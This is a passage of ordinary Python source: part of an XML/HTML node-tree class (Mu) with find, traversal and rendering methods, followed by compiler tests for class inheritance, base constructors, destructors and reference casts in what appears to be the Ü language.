''.join(chain( (xml_attr_summary(k, v, text_limit=32, all_attrs=False) for k, v in self.attrs.items()), (xml_child_summary(c, text_limit=32) for c in self.ch))) return f'<{subnode}{self.tag}:{words}>' def __delitem__(self, key:str) -> Any: del self.attrs[key] def __getitem__(self, key:str) -> Any: return self.attrs[key] def __setitem__(self, key:str, val:Any) -> Any: self.attrs[key] = val def get(self, key:str, default=None) -> Any: return self.attrs.get(key, default) def __iter__(self) -> Iterator[MuChild]: return iter(self.ch) @classmethod def from_raw(cls:Type[_Mu], raw:Dict) -> _Mu: 'Create a Mu object (or possibly a subclass instance chosen by tag) from a raw data dictionary.' tag = raw['tag'] attrs = raw['attrs'] raw_children = raw['ch'] if not isinstance(tag, str): raise ValueError(tag) if not isinstance(attrs, dict): raise ValueError(attrs) for k, v in attrs.items(): if not isinstance(k, str): raise ValueError(f'Mu attr key must be `str`; received: {k!r}') ch:MuChildren = [] for c in raw_children: if isinstance(c, mu_child_classes): ch.append(c) elif isinstance(c, dict): ch.append(cls.from_raw(c)) else: raise ValueError(f'Mu child must be `str`, `EscapedStr`, `Mu`, or `dict`; received: {c!r}') TagClass = cls.tag_types.get(tag, cls) return cast(_Mu, TagClass(tag=tag, attrs=attrs, ch=ch)) @classmethod def from_etree(cls:Type[_Mu], el:Element) -> _Mu: ''' Create an Mu object (possibly subclass by tag) from a standard library element tree. Note: this handles lxml comment objects specially, by turning them into nodes with a '!COMMENT' tag. ''' tag = el.tag if tag is Comment: tag = '!COMMENT' # `Comment` is a cython object; convert it to a string. # Collect children. attrs = el.attrib ch:MuChildren = [] text = el.text if text: ch.append(text) for child in el: ch.append(cls.from_etree(child)) text = child.tail if text: ch.append(text) TagClass = cls.tag_types.get(tag, cls) return cast(_Mu, TagClass(tag=tag, attrs=attrs, ch=ch)) @property def orig(self:_Mu) -> _Mu: 'If this node is a query subnode, return the original; otherwise raise ValueError.' if self._orig is None: raise ValueError(f'node is not a subnode: {self}') return self._orig @property def parent(self) -> 'Mu': 'If the node is a subnode, return the parent. Otherwise raise ValueError.' if self._parent is None: raise ValueError(f'node is not a subnode: {self}') return self._parent def subnode(self:_Mu, parent:'Mu') -> _Mu: 'Create a subnode for `self` referencing the provided `parent`.' if self._orig is not None: raise ValueError(f'node is already a subnode: {self}') return type(self)(tag=self.tag, attrs=self.attrs, ch=self.ch, _orig=self, _parent=parent) def child_items(self, ws=False, traversable=False) -> Iterator[Tuple[int,MuChild]]: 'Yield (index, child) pairs. If `ws` is False, then children that are purely whitespace will be filtered out.' for i, c in enumerate(self.ch): if isinstance(c, Mu): yield (i, (c.subnode(self) if traversable else c)) continue if isinstance(c, EscapedStr): c = c.string if not ws and html_ws_re.fullmatch(c): continue yield (i, c) def children(self, ws=False, traversable=False) -> Iterator[MuChild]: 'Yield child nodes and text. If `ws` is False, then children that are purely whitespace will be filtered out.' for c in self.ch: if isinstance(c, Mu): yield c.subnode(self) if traversable else c continue if isinstance(c, EscapedStr): c = c.string if not ws and html_ws_re.fullmatch(c): continue yield c def child_nodes(self, traversable=False) -> Iterator['Mu']: 'Yield child Mu nodes.' return ((c.subnode(self) if traversable else c) for c in self.ch if isinstance(c, Mu)) @property def has_substantial_children(self) -> bool: 'Predicate testing whether the node has non-whitespace children.' for c in self.ch: if isinstance(c, Mu): return True if isinstance(c, EscapedStr): c = c.string if c and not html_ws_re.fullmatch(c): return True return False @property def texts(self) -> Iterator[str]: 'Yield the text of the tree sequentially.' for c in self.ch: if isinstance(c, str): yield c elif isinstance(c, Mu): yield from c.texts elif isinstance(c, EscapedStr): yield c.string else: raise TypeError(repr(c)) # Expected str, Mu, or EscapedStr. @property def text(self) -> str: 'Return the text of the tree joined as a single string.' return ''.join(self.texts) @property def cl(self) -> str: '`cl` is shortand for the `class` attribute.' return str(self.attrs.get('class', '')) @cl.deleter def cl(self) -> None: del self.attrs['class'] @cl.setter def cl(self, val:str) -> None: self.attrs['class'] = val @property def classes(self) -> List[str]: 'The `class` attribute split into individual words.' return cast(str, self.attrs.get('class', '')).split() @classes.deleter def classes(self) -> None: del self.attrs['class'] @classes.setter def classes(self, val:Union[str, Iterable[str]]) -> None: if not isinstance(val, str): val = ' '.join(val) self.attrs['class'] = val def prepend_class(self, cl:str) -> None: try: existing = self.attrs['class'] except KeyError: self.attrs['class'] = cl else: self.attrs['class'] = f'{cl} {existing}' def append_class(self, cl:str) -> None: try: existing = self.attrs['class'] except KeyError: self.attrs['class'] = cl else: self.attrs['class'] = f'{existing} {cl}' @property def id(self) -> str: return str(self.attrs.get('id', '')) @id.setter def id(self, val:str) -> None: self.attrs['id'] = val @id.deleter def id(self) -> None: del self.attrs['id'] def all_ids(self) -> set[str]: ids = set() self.visit(pre=lambda node: ids.add(node.id)) return ids def unique_ids(self) -> set[str]: ids = Counter[str]() def count_ids(node:Mu) -> None: ids[node.id] += 1 self.visit(pre=count_ids) return { id for id, count in ids.items() if count == 1 } def unique_id(self, unique_id_set:set[str]) -> Optional[str]: id = self.id return id if id in unique_id_set else None def append(self, child:_MuChild) -> _MuChild: if isinstance(child, Mu) and child._orig is not None: child = child._orig if not isinstance(child, mu_child_classes): raise TypeError(child) self.ch.append(child) return child # type: ignore # The type of child._orig the same as child. def extend(self, children:Iterable[_MuChild]) -> None: for el in children: self.append(el) def _single(self, Child_type:Type[_Mu]) -> _Mu: for c in self.ch: if isinstance(c, Child_type): return c return self.append(Child_type()) def clean(self, deep=True) -> None: # Consolidate consecutive strings. ch:List[MuChild] = [] for c in self.ch: if isinstance(c, Mu): if deep: c.clean(deep) elif isinstance(c, str): if not c: continue # Do not append. if ch and isinstance(ch[-1], str): # Consolidate. ch[-1] += c continue # Do not append. else: raise ValueError(c) # Not mu_child_classes. ch.append(c) inline_tags = self.inline_tags if self.tag not in self.ws_sensitive_tags: # Strip strings adjacent to block elements. for i, (p, c, n) in enumerate(window_iter(ch, width=3), 1): if not isinstance(c, str): continue assert isinstance(p, Mu) assert isinstance(n, Mu) if p.tag not in inline_tags: c = c.lstrip() if n.tag not in inline_tags: c = c.rstrip() ch[i] = c # If this element is a block, strip text at beginning and end. if ch and self.tag not in inline_tags: c0 = ch[0] if isinstance(c0, str): ch[0] = c0.lstrip() cl = ch[-1] if isinstance(cl, str): ch[-1] = cl.rstrip() ch = [c for c in ch if c] # Filter now-empty text elements. # Reduce remaining, repeated whitespace down to single '\n' and ' ' characters. # https://www.w3.org/TR/CSS22/text.html#white-space-model # https://drafts.csswg.org/css-text-3/#white-space-phase-1 for i in range(len(ch)): c = ch[i] if isinstance(c, str): ch[i] = html_ws_re.sub(html_ws_replacement, c) self.ch[:] = ch # Mutate the original array beacuse it may be aliased by subnodes. # Picking and finding. @overload def pick_all(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> Iterator[_Mu]: ... @overload def pick_all(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> Iterator['Mu']: ... def pick_all(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): 'Pick all matching children of this node.' pred = xml_pred(type_or_tag=type_or_tag, cl=cl, text=text, attrs=attrs) return ((c.subnode(self) if traversable else c) for c in self.ch if isinstance(c, Mu) and pred(c)) @overload def find_all(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> Iterator[_Mu]: ... @overload def find_all(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> Iterator['Mu']: ... def find_all(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): 'Find matching nodes in the subtree rooted at this node.' pred = xml_pred(type_or_tag=type_or_tag, cl=cl, text=text, attrs=attrs) if text: return self._find_all_text(pred, traversable) else: return self._find_all(pred, traversable) def _find_all(self, pred:MuPred, traversable:bool) -> Iterator['Mu']: for c in self.ch: if isinstance(c, Mu): if pred(c): yield (c.subnode(self) if traversable else c) yield from c._find_all(pred, traversable) # Always search ch. TODO: use generator send() to let consumer decide? def _find_all_text(self, pred:MuPred, traversable:bool) -> Generator['Mu',None,bool]: ''' Use post-order algorithm to find matching text, and do not search parents of matching children. This is desirable because the calculation of text is expensive and the caller most likely does not want nodes that contain each other. ''' found_match = False for c in self.ch: if isinstance(c, Mu): child_match = yield from c._find_all_text(pred, traversable) if child_match: found_match = True elif pred(c): found_match = True yield (c.subnode(self) if traversable else c) return found_match @overload def pick_first(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def pick_first(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def pick_first(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): pred = xml_pred(type_or_tag=type_or_tag, cl=cl, text=text, attrs=attrs) for c in self.ch: if isinstance(c, Mu) and pred(c): return (c.subnode(self) if traversable else c) raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) @overload def find_first(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def find_first(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def find_first(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): for c in self.find_all(type_or_tag=type_or_tag, cl=cl, text=text, traversable=traversable, **attrs): return c raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) @overload def pick(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def pick(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def pick(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): first_match:Optional[Mu] = None for c in self.pick_all(type_or_tag=type_or_tag, cl=cl, text=text, traversable=traversable, **attrs): if first_match is None: first_match = c else: args_msg = fmt_xml_predicate_args(type_or_tag, cl, text, attrs) subsequent_match = c # Alias improves readablity of the following line in stack traces. raise MultipleMatchesError(self, args_msg, first_match, subsequent_match) if first_match is None: raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) return first_match @overload def find(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def find(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def find(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): first_match:Optional[Mu] = None for c in self.find_all(type_or_tag=type_or_tag, cl=cl, text=text, traversable=traversable, **attrs): if first_match is None: first_match = c else: args_msg = fmt_xml_predicate_args(type_or_tag, cl, text, attrs) subsequent_match = c # Alias improves readablity of the following line in stack traces. raise MultipleMatchesError(self, args_msg, first_match, subsequent_match) if first_match is None: raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) return first_match # Traversal. @overload def next(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def next(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def next(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): if self._orig is None or self._parent is None: raise ValueError(f'cannot traverse non-subnode: {self}') pred = xml_pred(type_or_tag=type_or_tag, cl=cl, text=text, attrs=attrs) found_orig = False for c in self._parent.ch: if not isinstance(c, Mu): continue if found_orig: if pred(c): return (c.subnode(self._parent) if traversable else c) elif c is self._orig: found_orig = True if not found_orig: raise ValueError('node was removed from parent') raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) @overload def prev(self, type_or_tag:Type[_Mu], *, cl:str='', text:str='', traversable=False, **attrs:str) -> _Mu: ... @overload def prev(self, type_or_tag:str='', *, cl:str='', text:str='', traversable=False, **attrs:str) -> 'Mu': ... def prev(self, type_or_tag='', *, cl:str='', text:str='', traversable=False, **attrs:str): if self._orig is None or self._parent is None: raise ValueError(f'cannot traverse non-subnode: {self}') pred = xml_pred(type_or_tag=type_or_tag, cl=cl, text=text, attrs=attrs) found_orig = False for c in reversed(self._parent.ch): if not isinstance(c, Mu): continue if found_orig: if pred(c): return (c.subnode(self._parent) if traversable else c) elif c is self._orig: found_orig = True if not found_orig: raise ValueError('node was removed from parent') raise NoMatchError(self, fmt_xml_predicate_args(type_or_tag, cl, text, attrs)) # Text. def summary_texts(self, _needs_space:bool=True) -> Generator[str,None,bool]: for child in self.ch: if isinstance(child, Mu): _needs_space = yield from child.summary_texts(_needs_space=_needs_space) continue for m in html_ws_split_re.finditer(str(child)): if m.lastgroup == 'space': if _needs_space: yield ' ' _needs_space = False else: yield m[0] _needs_space = True return _needs_space def summary_text(self, limit=0) -> str: if not limit: return ''.join(self.summary_texts()) parts:List[str] = [] length = 0 for part in self.summary_texts(): parts.append(part) length += len(part) if length > limit: break return ''.join(parts)[:limit] # Text summary. def summarize(self, levels=1, indent=0, all_attrs=True) -> str: nl_indent = '\n' + ' ' * indent return ''.join(self._summarize(levels, nl_indent, all_attrs=all_attrs)) def _summarize(self, levels:int, nl_indent:str, all_attrs:bool) -> Iterator[str]: if levels <= 0: yield str(self) else: subnode = '' if self._orig is None else '$' attr_words = ''.join(xml_attr_summary(k, v, text_limit=32, all_attrs=all_attrs) for k, v in self.attrs.items()) nl_indent1 = nl_indent + ' ' yield f'<{subnode}{self.tag}:{attr_words}' for c in self.ch: yield nl_indent1 if isinstance(c, Mu): yield from c._summarize(levels-1, nl_indent1, all_attrs) else: yield repr(c) yield '>' def discard(self, attr:str) -> None: try: del self.attrs[attr] except KeyError: pass def visit(self, *, pre:MuVisitor=None, post:MuVisitor=None, traversable=False) -> None: if pre is not None: pre(self) modified_children:List[MuChild] = [] first_mod_idx:Optional[int] = None for i, c in enumerate(self.ch): if isinstance(c, Mu): if traversable: c = c.subnode(self) try: c.visit(pre=pre, post=post, traversable=traversable) except DeleteNode: if first_mod_idx is None: first_mod_idx = i continue except FlattenNode: if first_mod_idx is None: first_mod_idx = i modified_children.extend(c.ch) # Insert children in place of `c`. continue if first_mod_idx is not None: modified_children.append(c) if first_mod_idx is not None: self.ch[first_mod_idx:] = modified_children if post is not None: post(self) def iter_visit(self, *, pre:MuIterVisitor=None, post:MuIterVisitor=None, traversable=False) -> Iterator[_T]: if pre is not None: yield from pre(self) for i, c in enumerate(self.ch): if isinstance(c, Mu): if traversable: c = c.subnode(self) yield from c.iter_visit(pre=pre, post=post, traversable=traversable) if post is not None: yield from post(self) # Rendering. def esc_attr_val(self, val:str) -> str: raise NotImplementedError def esc_text(self, text:str) -> str: raise NotImplementedError def fmt_attr_items(self, items:Iterable[Tuple[str,Any]]) -> str: 'Return a string that is either empty or with a leading space, containing all of the formatted items.' parts: List[str] = [] for k, v in items: k = self.replaced_attrs.get(k, k) if v in (None, True, False): v = str(v).lower() elif isinstance(v, Present): if v.is_present: v = '' else: continue parts.append(f' {k}="{self.esc_attr_val(str(v))}"') return ''.join(parts) def render(self, newline=True) -> Iterator[str]: 'Render the tree as a stream of text lines.' yield from self._render() if newline: yield '\n' def _render(self) -> Iterator[str]: 'Recursive helper to `render`.' if self.void_tags: self_closing = self.tag in self.void_tags if self_closing and self.ch: raise ValueError(self) else: self_closing = not self.ch attrs_str = self.fmt_attr_items(self.attrs.items()) head_slash = '/' if self_closing else '' yield f'<{self.tag}{attrs_str}{head_slash}>' if self_closing: return yield from self.render_children() yield f'' def render_children(self) -> Iterator[str]: child_newlines = ( len(self.ch) > 1 and (self.tag not in self.ws_sensitive_tags) and (self.tag not in self.inline_tags)) def is_block(el:MuChild) -> bool: return isinstance(el, Mu) and (el.tag not in self.inline_tags) if child_newlines: yield '\n' for child, next_child in window_pairs(self.ch): assert isinstance(child, mu_child_classes), child if isinstance(child, str): yield self.esc_text(child) elif isinstance(child, Mu): yield from child._render() elif isinstance(child, EscapedStr): assert isinstance(child.string, str), child.string yield child.string else: raise TypeError(child) # Expected str, EscapedStr, or Mu. if child_newlines and (is_block(child) or next_child is None or is_block(next_child)): yield '\n' def render_str(self, newline=True) -> str: 'Render the tree into a single string.' return ''.join(self.render(newline=newline)) def render_children_str(self, newline=True) -> str: 'Render the children into a single string.' return ''.join(self.render_children()) mu_child_classes = (str, EscapedStr, Mu) def xml_attr_summary(key:str, val:Any, *, text_limit:int, all_attrs:bool) -> str: ks = key if _word_re.fullmatch(key) else repr(key) if all_attrs or key in ('id', 'class'): return f' {ks}={repr_lim(val, text_limit)}' # Show id and class values. return f' {ks}=…' # Omit other attribute values. def xml_child_summary(child:MuChild, text_limit:int) -> str: if isinstance(child, Mu): text = child.summary_text(limit=text_limit) if text: return f' {child.tag}:{repr_lim(text, limit=text_limit)}' return ' ' + child.tag if isinstance(child, EscapedStr): child = child.string text = html_ws_re.sub(newline_or_space_for_ws, child) return ' ' + repr_lim(text, limit=text_limit) def xml_pred(type_or_tag:Union[str,Type[_Mu]]='', *, cl:str='', text:str='', attrs:Dict[str,Any]={}) -> MuPred: 'Update _attrs with items from other arguments, then construct a predicate that tests Mu nodes.' tag_pred:Callable if not type_or_tag: tag_pred = lambda node: True elif isinstance(type_or_tag, type): tag_pred = lambda node: isinstance(node, type_or_tag) # type: ignore else: tag_pred = lambda node: node.tag == type_or_tag def predicate(node:Mu) -> bool: return ( tag_pred(node) and (not cl or cl in node.classes) and all(node.attrs.get(k.replace('_', '-')) == v for k, v in attrs.items()) and (not text or text in node.text)) return predicate def fmt_xml_predicate_args(type_or_tag:Union[Type,str], cl:str, text:str, attrs:Dict[str,str]) -> str: words:List[str] = [] if type_or_tag: words.append(f'`{type_or_tag.__name__}`' if isinstance(type_or_tag, type) else repr(type_or_tag)) if cl: words.append(f'cl={cl!r}') for k, v in attrs.items(): words.append(xml_attr_summary(k, v, text_limit=0, all_attrs=True).lstrip()) if text: words.append(f'…{text!r}…') return ' '.join(words) def newline_or_space_for_ws(match:Match) -> str: return '\n' if '\n' in match[0] else ' ' def html_ws_replacement(m:Match) -> str: return '\n' if '\n' in m[0] else ' ' # HTML defines ASCII whitespace as "U+0009 TAB, U+000A LF, U+000C FF, U+000D CR, or U+0020 SPACE." html_ws_re = re.compile(r'[\t\n\f\r ]+') html_ws_split_re = re.compile(r'(?P[\t\n\f\r ])|[^\t\n\f\r ]+') _word_re = re.compile(r'[-\w]+') source/tests/py_tests/inheritance_test.py from py_tests_common import * def InheritanceTest_ClassKindAttribute_Test0(): c_program_text= """ class S final {} """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassKindAttribute_Test1(): c_program_text= """ class S polymorph {} """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassKindAttribute_Test2(): c_program_text= """ class S interface {} """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassKindAttribute_Test3(): c_program_text= """ class S abstract {} """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassKindAttribute_Test4(): c_program_text= """ template class S abstract {} // class kind attribute after template signature parameters """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test0(): c_program_text= """ class A polymorph{} class C polymorph : A {} // Single parent + kind attribute """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test1(): c_program_text= """ class A interface{} class B polymorph{} class C final : A, B {} // Multiple parents + kind attribute """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test2(): c_program_text= """ class A interface{} class B polymorph{} class C : A, B {} // Multiple parents and no kind attribute """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test3(): c_program_text= """ class A polymorph{} template class C polymorph : A {} // Single parent + kind attribute + template """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test4(): c_program_text= """ class A interface{} class B polymorph{} template class C final : A, B {} // Multiple parents + kind attribute + template """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test5(): c_program_text= """ class A interface{} class B polymorph{} template class C : A, B {} // Multiple parents and no kind attribute + template """ tests_lib.build_program( c_program_text ) def InheritanceTest_ClassParentsList_Test6(): c_program_text= """ namespace NNN{ class A polymorph{} } class C : NNN::A {} // Single parent inside namespace """ tests_lib.build_program( c_program_text ) def InheritanceTest_ParentClassNameVisibleInChild_Test0(): c_program_text= """ class A polymorph { type I= i32; } class B : A{} fn Foo() : i32 { var B::I r= 5652111; // B::I must be visible return r; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 5652111 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test0(): c_program_text= """ class A polymorph { type I= f64; } class B : A { type I= i32; } fn Foo() : i32 { var B::I r= 24574; // B::I must be selected, instead of A::I return r; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 24574 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test1(): c_program_text= """ class A polymorph { type I= f64; } class B : A { fn I() : i32 // Child class have different kind of symbol with same name. { return 4447854; } } fn Foo() : i32 { return B::I(); // Must access function B::I, not type A::I } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 4447854 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test2(): c_program_text= """ class A polymorph { fn I() : i32 { return 0; } } class B : A { type I= i32; // Child class have different kind of symbol with same name. } fn Foo() : i32 { var B::I r= 658566; // type B::I must be selected, instead of function A::I. return r; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 658566 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test3(): c_program_text= """ class A polymorph { fn foo() : i32 { return 0; } } class B : A { fn foo() : i32 { return 5584; } // Static function shadows parent class function with exact signature. } fn Foo() : i32 { return B::foo(); // B::foo must be called } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 5584 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test4(): c_program_text= """ class A polymorph { fn foo( i32 x ) : i32 { return x; } } class B : A { fn foo() : i32 { return 0; } // Function in child class merged with one functions set with parent class functions. } fn Foo() : i32 { return B::foo( 996544 ); // A::foo must be called } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 996544 ) def InheritanceTest_ChildClassNameOverridesParentClassName_Test5(): c_program_text= """ class A polymorph { f32 x; fn constructor() ( x= 0.0f ) {} } class B : A { i32 x; fn constructor() ( x= 0 ) {} } fn Foo() : i32 { var B mut b; b.x= 66541211; // member B::x must be selected return b.x; } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 66541211 ) def InheritanceTest_ParentClassFieldAccess_Test0(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 541 ){} } class B : A { f32 b; fn constructor()( b= 124.3f ){} } class C : B { f64 c; fn constructor()( c= -54.2 ){} } fn Foo() : i32 { var C c; return i32( f64(c.a) - f64(c.b) / f64(c.c) ); // Access parent fields via .member_access. } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_ParentClassFieldAccess_Test1(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 541 ){} } class B : A { f32 b; fn constructor()( b= 124.3f ){} } class C : B { f64 c; fn constructor()( c= -54.2 ){} fn Foo( this ) :i32 { return i32( f64(a) - f64(b) / f64(c) ); // Access parent fields via NamedOperand. } } fn Foo() : i32 { var C c; return c.Foo(); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_ParentClassFieldAccess_Test2(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 541 ){} } class B : A { f32 b; fn constructor()( b= 124.3f ){} } class C : B { f64 c; fn constructor()( c= -54.2 ){} fn Foo( this ) :i32 { return i32( f64(A::a) - f64(B::b) / f64(C::c) ); // Access parent fields via complex NamedOperand. } } fn Foo() : i32 { var C c; return c.Foo(); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_ParentClassFieldAccess_Test3(): c_program_text= """ class One polymorph { i32 a; fn constructor()( a= 654 ){} } class Two : One { i32 a; fn constructor()( a= 321 ){} } class S : Two { fn GetA( this ) : i32 { return One::a - Two::a; } // Should access fields of defferent classes } fn Foo() : i32 { var S c; return c.GetA(); } """ tests_lib.build_program( c_program_text ) call_result= tests_lib.run_function( "_Z3Foov" ) assert( call_result == 654 - 321 ) def InheritanceTest_InitializeBaseClass_Test0(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 541 ){} } class B : A { f32 b; fn constructor()( b= 124.3f ){} // Must implicitly call A::constructor } fn Foo() { var B b; halt if( b.a != 541 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test1(): c_program_text= """ class A polymorph { i32 a; fn constructor( i32 x )( a= x ){} } class B : A { fn constructor( i32 x )( base(x) ){} // Must explicitly call A::constructor } fn Foo() { var B b( 55521 ); halt if( b.a != 55521 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test2(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 988541 ){} } class B : A { // Must generate default constructor, that calls A::constructor } fn Foo() { var B b; halt if( b.a != 988541 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test3(): c_program_text= """ class A polymorph { i32 a; fn constructor( i32 x )( a= x ){} } class B : A { i32 b; fn constructor( i32 x )( base(x), b= a ){} // Must access parent class field after explicit base initialization. } fn Foo() { var B b( 1451 ); halt if( b.a != 1451 ); halt if( b.b != 1451 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test4(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 2018 ){} } class B : A { i32 b; fn constructor()( b= a ){} // Must access parent class field after implicit base initialization. } fn Foo() { var B b; halt if( b.a != 2018 ); halt if( b.b != 2018 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test5(): c_program_text= """ class A polymorph { i32 a; fn constructor( i32 x )( a= x ){} } class B : A { i32 b; fn constructor( i32 x )( base(x), b= base.a ){} // Must access "base" after explicit "base" initialization. } fn Foo() { var B b( 77457 ); halt if( b.a != 77457 ); halt if( b.b != 77457 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_InitializeBaseClass_Test6(): c_program_text= """ class A polymorph { i32 a; fn constructor()( a= 66633625 ){} } class B : A { i32 b; fn constructor()( b= base.a ){} // Must access "base" after implicit "base" initialization. } fn Foo() { var B b; halt if( b.a != 66633625 ); halt if( b.b != 66633625 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def InheritanceTest_BaseReference_Test0(): c_program_text= """ class A polymorph { i32 a; fn constructor( i32 in_a )( a= in_a ){} } class B : A { i32 a; fn constructor( i32 in_base_a, i32 in_a )( base(in_base_a), a= in_a ){} fn GetA( this ) : i32 { return a; } fn GeBasetA( this ) : i32 { return base.a; } } fn Foo() { var B b( 584, 99965 ); halt if( b.GetA() != 99965 ); halt if( b.GeBasetA() != 584 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def Desturctors_ForInheritance_Test0(): c_program_text= """ class A polymorph { i32 &mut a; fn constructor( this'x', i32 &'y mut in_a ) ' x <- y' ( a= in_a ){} fn destructor() { a= 0; } } class B : A { fn constructor( this'x', i32 &'y mut in_a ) ' x <- y' ( base(in_a) ){} // Must generate default destructor, which calls base destructor. } fn Foo() { var i32 mut x= 586; { var B b( x ); // Destuctor for 'A' (base of 'B') must be called. } halt if( x != 0 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def Desturctors_ForInheritance_Test1(): c_program_text= """ class A polymorph { i32 &mut a; fn constructor( this'x', i32 &'y mut in_a ) ' x <- y' ( a= in_a ){} fn destructor() { a= 0; } } class B : A { fn constructor( this'x', i32 &'y mut in_a ) ' x <- y' ( base(in_a) ){} fn destructor() { // after end of this destructor, destructor for base must be called. } } fn Foo() { var i32 mut x= 847; { var B b( x ); } halt if( x != 0 ); } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def ChildToParentReferenceCast_Test0(): c_program_text= """ class A polymorph{} class B : A {} fn Bar( A& a ) {} fn Foo() { var B b; Bar(b); // Must convert B& to A&. Direct child to parent conversion. } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def ChildToParentReferenceCast_Test1(): c_program_text= """ class A polymorph{} class AA interface{} class B : A, AA {} fn Bar( A& a ) {} fn Baz( AA& aa ) {} fn Foo() { var B b; // Direct child to parent conversion for class with two parents. Bar(b); // Must convert B& to A&. Baz(b); // Must convert B& to AA&. } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def ChildToParentReferenceCast_Test2(): c_program_text= """ class A polymorph{} class B : A {} class C : B {} fn Bar( A& a ) {} fn Foo() { var C c; // Undirect child to parent conversion. Bar(c); // Must convert B& to A&. } """ tests_lib.build_program( c_program_text ) tests_lib.run_function( "_Z3Foov" ) def ChildToParentReferenceCast_Test3(): c_program_text= """ class A0 interface{} class A1 interface{} class A interface : A0, A1 {} class B0 interface{} class B1 interface{} class B interface : B0, B1 {} class C : A, B {} fn BarA0( A0& a0 ) {} fn BarA1( A1& a1 ) {} fn BarB0( B0& b0 ) {} fn BarB1( 